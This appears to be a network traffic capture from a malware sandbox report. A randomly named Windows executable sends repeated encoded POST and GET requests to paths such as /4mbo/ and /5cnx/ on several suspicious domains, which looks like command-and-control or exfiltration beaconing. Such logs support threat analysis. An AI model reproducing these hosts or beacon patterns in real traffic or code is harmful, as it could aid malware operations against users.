                                                            Nov 24, 2024 08:14:09.109989882 CET | 328 | IN | Data Raw: 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 70 61 67 65 5f 6d 6f 62 69 6c 65 2d 6f 76 65 72 66 6c 6f 77 5f 68 69 64 64 65 6e 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65
                                                            Data Ascii: ia (min-width:1024px){.is_adaptive .b-page_mobile-overflow_hidden{overflow:visible}}.ie .b-page{display:block}.b-page__footer-down{flex:1 0 auto;overflow:hidden}.ie .b-page__footer-down{min-height:100%}@media (min-width:1024px){.is_adaptive .b
                                                            Nov 24, 2024 08:14:09.110146046 CET | 1236 | IN | Data Raw: 69 73 69 62 6c 65 7d 2e 62 2d 70 61 67 65 5f 5f 66 6f 6f 74 65 72 2d 68 69 64 65 20 2e 62 2d 70 61 67 65 5f 5f 66 6f 6f 74 65 72 2d 64 6f 77 6e 2d 63 6f 6e 74 65 6e 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 62 2d 70 61 67 65 5f
                                                            Data Ascii: isible}.b-page__footer-hide .b-page__footer-down-content{padding-bottom:0}.b-page__footer-hide .b-footer{display:none}.b-page__content-wrapper{margin:0 auto}.b-page__content-wrapper_style_indent{padding-right:24px;padding-left:24px}.b-page__co
                                                            Nov 24, 2024 08:14:09.110198975 CET | 1236 | IN | Data Raw: 69 6e 2d 77 69 64 74 68 3a 39 39 36 70 78 7d 7d 2e 62 2d 70 61 67 65 5f 5f 61 64 64 69 74 69 6f 6e 2d 74 69 74 6c 65 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 66 6f 6e 74 3a 37 30 30 20 32 30 70 78 2f 33 30 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c
                                                            Data Ascii: in-width:996px}}.b-page__addition-title{float:left;font:700 20px/30px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;line-height:58px}.b-page__addition-title-link{text-decoration:none}.b-page__addition-title-link:hover{text-decoratio
                                                            Nov 24, 2024 08:14:09.110213041 CET | 328 | IN | Data Raw: 20 2e 62 2d 70 61 67 65 5f 6f 76 65 72 66 6c 6f 77 5f 76 69 73 69 62 6c 65 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 7d 0a 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a
                                                            Data Ascii: .b-page_overflow_visible{overflow:visible}}/*!**********************************************************************************************************************************************************************************************!*\
                                                            Nov 24, 2024 08:14:09.110460997 CET | 1236 | IN | Data Raw: 6f 73 74 63 73 73 2d 6c 6f 61 64 65 72 2f 73 72 63 2f 69 6e 64 65 78 2e 6a 73 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 6c 65 73 73 2d 6c 6f 61 64 65 72 2f 64 69 73 74 2f 63 6a 73 2e 6a 73 21 2e 2f 62 65 6d 2f 62 6c 6f 63 6b 73 2e 67 75 69
                                                            Data Ascii: ostcss-loader/src/index.js!./node_modules/less-loader/dist/cjs.js!./bem/blocks.guide/b-text/b-text.less ***! \***********************************************************************************************************************************
                                                            Nov 24, 2024 08:14:09.110474110 CET | 1236 | IN | Data Raw: 69 67 2d 63 6f 6d 70 61 63 74 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 2c 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 62 69 67 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 32 70 78 7d 2e 62
                                                            Data Ascii: ig-compact.b-text_margin_top,.b-text_size_big.b-text_margin_top{margin-top:42px}.b-text_size_big-compact{font:32px/36px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:42px}.b-text_size_large{font:24px/36px Inter,Arial,H
                                                            Nov 24, 2024 08:14:09.110486031 CET | 328 | IN | Data Raw: 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 38 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 73 6d 61 6c 6c 2d 63 6f 6d 70 61 63 74
                                                            Data Ascii: a Neue,Helvetica,FreeSans,sans-serif;margin-bottom:18px}.b-text_size_small-compact.b-text_margin_top,.b-text_size_small.b-text_margin_top{margin-top:18px}.b-text_size_small-compact{font:12px/12px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,s
                                                            Nov 24, 2024 08:14:09.110893011 CET | 1236 | IN | Data Raw: 65 78 74 5f 73 69 7a 65 5f 67 69 61 6e 74 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 37 32 70 78 2f 38 34 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61
                                                            Data Ascii: ext_size_giant\@desktop{font:72px/84px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}html:not(.is_adaptive) .b-text_size_giant-compact\@desktop.b-text_margin_top,html:not(.is_adaptive) .b-text_size_giant\@desktop.
                                                            Nov 24, 2024 08:14:09.229722023 CET | 1236 | IN | Data Raw: 3a 33 32 70 78 2f 33 36 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a
                                                            Data Ascii: :32px/36px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:42px}html:not(.is_adaptive) .b-text_size_large\@desktop{font:24px/36px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}html:not(.is_a


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.10 | 49923 | 13.248.169.48 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:14:15.518095016 CET | 666 | OUT | POST /4mbo/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.aktmarket.xyz
                                                            Origin: http://www.aktmarket.xyz
                                                            Referer: http://www.aktmarket.xyz/4mbo/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 193
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 65 59 41 36 76 65 75 4c 4b 77 2b 32 2f 4d 66 73 6f 48 61 41 4a 56 35 5a 6e 71 65 4b 37 63 73 6d 43 6f 39 6a 76 42 35 32 55 77 2f 79 6c 55 37 58 7a 51 6b 77 31 30 6d 35 50 6e 6a 48 52 71 2b 72 37 4d 55 55 66 41 65 75 4b 66 4e 64 53 36 36 6b 42 61 45 4d 58 70 32 65 4b 41 6e 5a 78 58 7a 76 41 4f 43 64 78 6b 57 6c 37 77 43 49 6e 36 4d 2f 73 4d 35 47 36 6f 74 64 36 53 67 78 59 49 49 6e 63 7a 66 4b 4a 6f 33 6d 30 46 62 49 48 61 62 57 56 34 35 35 79 63 39 79 43 78 58 78 61 49 6d 6d 46 75 7a 4e 30 34 6b 77 66 34 79 44 46 73 49 76 54 4b 4e 5a 67 52 74 30 79 62 46 4d
                                                            Data Ascii: 9HaD=eYA6veuLKw+2/MfsoHaAJV5ZnqeK7csmCo9jvB52Uw/ylU7XzQkw10m5PnjHRq+r7MUUfAeuKfNdS66kBaEMXp2eKAnZxXzvAOCdxkWl7wCIn6M/sM5G6otd6SgxYIInczfKJo3m0FbIHabWV455yc9yCxXxaImmFuzN04kwf4yDFsIvTKNZgRt0ybFM


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.10 | 49929 | 13.248.169.48 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:14:18.182549953 CET | 690 | OUT | POST /4mbo/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.aktmarket.xyz
                                                            Origin: http://www.aktmarket.xyz
                                                            Referer: http://www.aktmarket.xyz/4mbo/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 217
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 65 59 41 36 76 65 75 4c 4b 77 2b 32 2b 73 50 73 72 6b 69 41 65 6c 35 59 69 71 65 4b 78 38 73 63 43 6f 35 6a 76 41 38 37 55 43 62 79 69 31 4c 58 79 55 77 77 30 30 6d 35 46 48 6a 4f 4d 36 2f 6c 37 4d 51 63 66 45 43 75 4b 65 70 64 53 2f 65 6b 43 70 38 50 58 35 32 63 47 67 6e 62 31 58 7a 76 41 4f 43 64 78 6b 53 62 37 77 71 49 6e 70 6b 2f 71 70 5a 46 33 49 74 65 35 53 67 78 63 49 49 6a 63 7a 66 34 4a 71 44 59 30 48 54 49 48 61 4c 57 56 4e 56 2b 34 63 39 6f 66 42 57 2b 65 4b 6d 6a 4e 4d 7a 6b 75 37 45 6c 49 75 32 59 47 4e 31 6f 43 62 73 4f 7a 6d 78 36 38 64 77 6d 4f 6c 30 4c 4c 37 55 59 75 58 7a 78 38 33 79 49 78 53 37 45 55 67 3d 3d
                                                            Data Ascii: 9HaD=eYA6veuLKw+2+sPsrkiAel5YiqeKx8scCo5jvA87UCbyi1LXyUww00m5FHjOM6/l7MQcfECuKepdS/ekCp8PX52cGgnb1XzvAOCdxkSb7wqInpk/qpZF3Ite5SgxcIIjczf4JqDY0HTIHaLWVNV+4c9ofBW+eKmjNMzku7ElIu2YGN1oCbsOzmx68dwmOl0LL7UYuXzx83yIxS7EUg==


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.10 | 49936 | 13.248.169.48 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:14:20.851950884 CET | 1703 | OUT | POST /4mbo/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.aktmarket.xyz
                                                            Origin: http://www.aktmarket.xyz
                                                            Referer: http://www.aktmarket.xyz/4mbo/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1229
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 65 59 41 36 76 65 75 4c 4b 77 2b 32 2b 73 50 73 72 6b 69 41 65 6c 35 59 69 71 65 4b 78 38 73 63 43 6f 35 6a 76 41 38 37 55 43 54 79 6c 47 44 58 7a 31 77 77 33 30 6d 35 62 58 6a 44 4d 36 2f 6f 37 49 38 59 66 45 4f 51 4b 63 68 64 53 5a 53 6b 48 59 38 50 43 4a 32 63 63 41 6e 65 78 58 7a 32 41 4f 53 52 78 6b 43 62 37 77 71 49 6e 73 67 2f 74 38 35 46 78 49 74 64 36 53 67 39 59 49 49 48 63 33 7a 6f 4a 70 76 49 33 33 7a 49 48 37 37 57 47 4c 42 2b 30 63 39 75 65 42 58 68 65 4b 72 7a 4e 4d 2f 67 75 36 67 50 49 70 61 59 56 37 30 70 59 5a 38 7a 72 47 35 47 33 76 30 42 4f 53 73 50 4d 6f 46 69 76 55 6a 70 6e 30 7a 48 6b 32 79 51 44 38 4c 69 73 52 30 74 53 48 30 4a 58 39 4e 55 55 70 4e 73 45 32 54 41 6a 62 38 70 4c 4d 32 5a 32 42 77 6f 71 55 39 63 41 6c 61 65 69 68 57 79 61 69 44 44 41 30 53 70 74 69 6c 49 78 4a 78 4d 4b 4a 64 63 67 53 55 49 67 49 69 56 54 31 79 4e 4c 6c 6e 5a 56 77 51 48 33 53 79 6e 37 78 69 73 6c 69 34 71 66 63 66 45 78 68 64 39 59 42 30 73 47 6d 70 67 68 50 73 56 32 57 77 45 62 [TRUNCATED]
                                                            Data Ascii: 9HaD=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 [TRUNCATED]


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.10 | 49943 | 13.248.169.48 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:14:23.503890038 CET | 401 | OUT | GET /4mbo/?9HaD=TaoaspSuXCWG+J6Qu2ekK1wrjY2r/s8nGO1Ev0B6QwWm63/Js3V07H2UbHrGJNHujJI3HhKgRchyd4beF5Q/e7/FZQPmwnmSAvyJ8G6Q9CuC8rAD3Q==&wdv4=1RD4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.aktmarket.xyz
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Nov 24, 2024 08:14:24.686172009 CET | 386 | IN | HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Sun, 24 Nov 2024 07:14:24 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 246
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 48 61 44 3d 54 61 6f 61 73 70 53 75 58 43 57 47 2b 4a 36 51 75 32 65 6b 4b 31 77 72 6a 59 32 72 2f 73 38 6e 47 4f 31 45 76 30 42 36 51 77 57 6d 36 33 2f 4a 73 33 56 30 37 48 32 55 62 48 72 47 4a 4e 48 75 6a 4a 49 33 48 68 4b 67 52 63 68 79 64 34 62 65 46 35 51 2f 65 37 2f 46 5a 51 50 6d 77 6e 6d 53 41 76 79 4a 38 47 36 51 39 43 75 43 38 72 41 44 33 51 3d 3d 26 77 64 76 34 3d 31 52 44 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9HaD=TaoaspSuXCWG+J6Qu2ekK1wrjY2r/s8nGO1Ev0B6QwWm63/Js3V07H2UbHrGJNHujJI3HhKgRchyd4beF5Q/e7/FZQPmwnmSAvyJ8G6Q9CuC8rAD3Q==&wdv4=1RD4"}</script></head></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.10 | 49959 | 13.248.169.48 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:14:30.302067041 CET | 660 | OUT | POST /5cnx/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.a1shop.shop
                                                            Origin: http://www.a1shop.shop
                                                            Referer: http://www.a1shop.shop/5cnx/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 193
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 6c 57 79 70 58 48 6a 39 39 57 4c 45 42 47 55 6c 52 51 37 2f 6b 36 34 54 6a 72 72 46 41 68 4d 6f 38 64 72 66 52 36 63 65 33 67 4e 6d 41 45 62 30 70 31 2f 74 4b 38 6c 30 34 36 56 33 7a 62 5a 66 49 6b 66 36 4e 67 73 36 2b 43 6a 38 72 43 7a 4d 36 65 6b 74 36 68 4a 72 64 41 77 62 4b 39 55 30 58 67 56 73 57 2f 46 6c 73 36 47 54 58 73 57 6e 6e 62 71 4a 2b 45 46 75 6a 36 4f 46 7a 58 76 6a 42 42 34 6c 48 67 47 72 71 44 78 2b 50 59 42 51 4f 31 2b 59 6e 63 39 65 75 34 46 77 6d 6f 51 70 42 58 7a 6d 79 4e 51 45 47 33 41 74 70 2b 33 44 32 75 4e 58 57 45 61 64 55 59 52 2b
                                                            Data Ascii: 9HaD=lWypXHj99WLEBGUlRQ7/k64TjrrFAhMo8drfR6ce3gNmAEb0p1/tK8l046V3zbZfIkf6Ngs6+Cj8rCzM6ekt6hJrdAwbK9U0XgVsW/Fls6GTXsWnnbqJ+EFuj6OFzXvjBB4lHgGrqDx+PYBQO1+Ync9eu4FwmoQpBXzmyNQEG3Atp+3D2uNXWEadUYR+


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.10 | 49967 | 13.248.169.48 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:14:32.961981058 CET | 684 | OUT | POST /5cnx/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.a1shop.shop
                                                            Origin: http://www.a1shop.shop
                                                            Referer: http://www.a1shop.shop/5cnx/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 217
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 6c 57 79 70 58 48 6a 39 39 57 4c 45 41 6c 4d 6c 58 7a 44 2f 31 4b 34 53 74 4c 72 46 4b 42 4d 6b 38 64 6e 66 52 37 59 30 33 79 35 6d 41 6c 72 30 75 30 2f 74 4a 38 6c 30 7a 61 56 2b 2b 37 5a 59 49 6b 6a 49 4e 67 41 36 2b 44 48 38 72 48 50 4d 36 75 59 75 36 78 4a 70 47 51 77 64 48 64 55 30 58 67 56 73 57 2f 35 50 73 36 65 54 58 38 6d 6e 6b 35 53 4f 2f 45 46 74 33 71 4f 46 33 58 75 6b 42 42 35 43 48 69 6a 4d 71 41 4a 2b 50 64 39 51 58 48 57 62 6f 63 39 59 68 59 45 73 69 34 4e 65 4f 53 48 66 30 50 4a 46 63 6b 55 56 6a 2f 4b 45 6e 2f 73 41 46 7a 47 54 61 65 6b 55 63 42 36 6b 7a 63 52 50 75 6e 74 65 33 2b 65 4c 51 37 75 30 64 51 3d 3d
                                                            Data Ascii: 9HaD=lWypXHj99WLEAlMlXzD/1K4StLrFKBMk8dnfR7Y03y5mAlr0u0/tJ8l0zaV++7ZYIkjINgA6+DH8rHPM6uYu6xJpGQwdHdU0XgVsW/5Ps6eTX8mnk5SO/EFt3qOF3XukBB5CHijMqAJ+Pd9QXHWboc9YhYEsi4NeOSHf0PJFckUVj/KEn/sAFzGTaekUcB6kzcRPunte3+eLQ7u0dQ==


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            11 | 192.168.2.10 | 49974 | 13.248.169.48 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:14:35.619338989 CET | 1697 | OUT | POST /5cnx/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.a1shop.shop
                                                            Origin: http://www.a1shop.shop
                                                            Referer: http://www.a1shop.shop/5cnx/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1229
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 6c 57 79 70 58 48 6a 39 39 57 4c 45 41 6c 4d 6c 58 7a 44 2f 31 4b 34 53 74 4c 72 46 4b 42 4d 6b 38 64 6e 66 52 37 59 30 33 79 68 6d 41 58 6a 30 75 54 4c 74 49 38 6c 30 77 61 56 7a 2b 37 59 45 49 6b 4b 44 4e 67 38 4d 2b 42 50 38 74 6c 33 4d 34 63 38 75 6a 42 4a 70 5a 41 77 63 4b 39 55 6c 58 67 46 53 57 2b 56 50 73 36 65 54 58 2b 2b 6e 7a 37 71 4f 39 45 46 75 6a 36 4f 7a 7a 58 75 41 42 41 52 34 48 69 32 37 72 77 70 2b 42 5a 68 51 56 55 2b 62 6c 63 39 61 74 34 45 6b 69 34 42 42 4f 57 66 39 30 4f 38 65 63 6b 73 56 68 70 6a 2b 32 4e 74 61 52 77 47 70 61 34 41 59 54 45 69 32 78 49 52 47 35 55 42 33 6c 4d 4b 61 65 2f 33 52 65 73 4c 54 2f 6e 46 56 6c 53 65 45 57 6a 32 79 4a 62 34 67 4c 66 59 59 79 74 53 69 78 30 42 77 32 41 52 62 72 75 2b 46 6f 56 54 4d 42 71 6b 4e 50 62 37 31 49 73 52 43 36 73 46 54 46 77 75 39 7a 57 79 4a 71 64 52 35 43 63 67 79 72 36 35 6b 68 4f 62 48 4c 43 67 30 70 57 64 6c 4a 76 46 77 32 30 31 73 43 67 39 32 30 75 5a 69 73 78 55 73 55 52 6c 37 76 4e 37 6d 44 55 32 63 41 [TRUNCATED]
                                                            Data Ascii: 9HaD=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 [TRUNCATED]


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            12 | 192.168.2.10 | 49980 | 13.248.169.48 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:14:38.268861055 CET | 399 | OUT | GET /5cnx/?9HaD=oUaJUx3W91XKGFwkbiDYgYplg4TZBQwbgtCkXvgonjE8SHvx+U3TNstQnLVJ8Y9FFWXzakAfwSz/u1Ky3cg6+DtwGVYcLfdFQx5ESoBa74WqNsm9mQ==&wdv4=1RD4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.a1shop.shop
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Nov 24, 2024 08:14:39.452709913 CET | 386 | IN | HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Sun, 24 Nov 2024 07:14:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 246
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 48 61 44 3d 6f 55 61 4a 55 78 33 57 39 31 58 4b 47 46 77 6b 62 69 44 59 67 59 70 6c 67 34 54 5a 42 51 77 62 67 74 43 6b 58 76 67 6f 6e 6a 45 38 53 48 76 78 2b 55 33 54 4e 73 74 51 6e 4c 56 4a 38 59 39 46 46 57 58 7a 61 6b 41 66 77 53 7a 2f 75 31 4b 79 33 63 67 36 2b 44 74 77 47 56 59 63 4c 66 64 46 51 78 35 45 53 6f 42 61 37 34 57 71 4e 73 6d 39 6d 51 3d 3d 26 77 64 76 34 3d 31 52 44 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9HaD=oUaJUx3W91XKGFwkbiDYgYplg4TZBQwbgtCkXvgonjE8SHvx+U3TNstQnLVJ8Y9FFWXzakAfwSz/u1Ky3cg6+DtwGVYcLfdFQx5ESoBa74WqNsm9mQ==&wdv4=1RD4"}</script></head></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            13 | 192.168.2.10 | 49987 | 107.167.84.42 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:14:45.918659925 CET | 663 | OUT | POST /bw18/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.cssa.auction
                                                            Origin: http://www.cssa.auction
                                                            Referer: http://www.cssa.auction/bw18/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 193
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 68 6a 69 6d 42 4d 75 52 74 63 7a 54 51 49 65 4e 71 6d 64 70 2b 43 4c 41 75 72 5a 34 72 69 68 71 52 4b 6c 38 61 41 64 52 76 4e 4f 4f 34 56 74 65 75 38 79 37 68 47 71 77 33 73 47 30 72 4d 6a 30 34 5a 4d 7a 44 69 41 45 44 64 72 39 6f 51 44 41 4a 50 7a 79 6f 35 70 63 61 46 68 4c 34 6e 50 62 36 48 69 42 38 6a 5a 75 32 6b 36 72 79 5a 48 51 4f 6f 73 46 5a 56 4f 76 4a 38 30 53 53 70 75 6c 45 41 46 6b 34 69 66 38 31 6e 35 49 7a 6a 74 36 4f 68 70 6c 67 73 68 70 63 5a 6a 33 61 62 50 6b 32 6a 43 62 7a 6e 63 2b 53 76 37 70 69 6e 70 56 2f 6e 33 6d 56 62 64 4c 4c 72 7a 7a
                                                            Data Ascii: 9HaD=hjimBMuRtczTQIeNqmdp+CLAurZ4rihqRKl8aAdRvNOO4Vteu8y7hGqw3sG0rMj04ZMzDiAEDdr9oQDAJPzyo5pcaFhL4nPb6HiB8jZu2k6ryZHQOosFZVOvJ80SSpulEAFk4if81n5Izjt6OhplgshpcZj3abPk2jCbznc+Sv7pinpV/n3mVbdLLrzz
                                                            Nov 24, 2024 08:14:47.154764891 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 1251
                                                            date: Sun, 24 Nov 2024 07:14:46 GMT
                                                            server: LiteSpeed
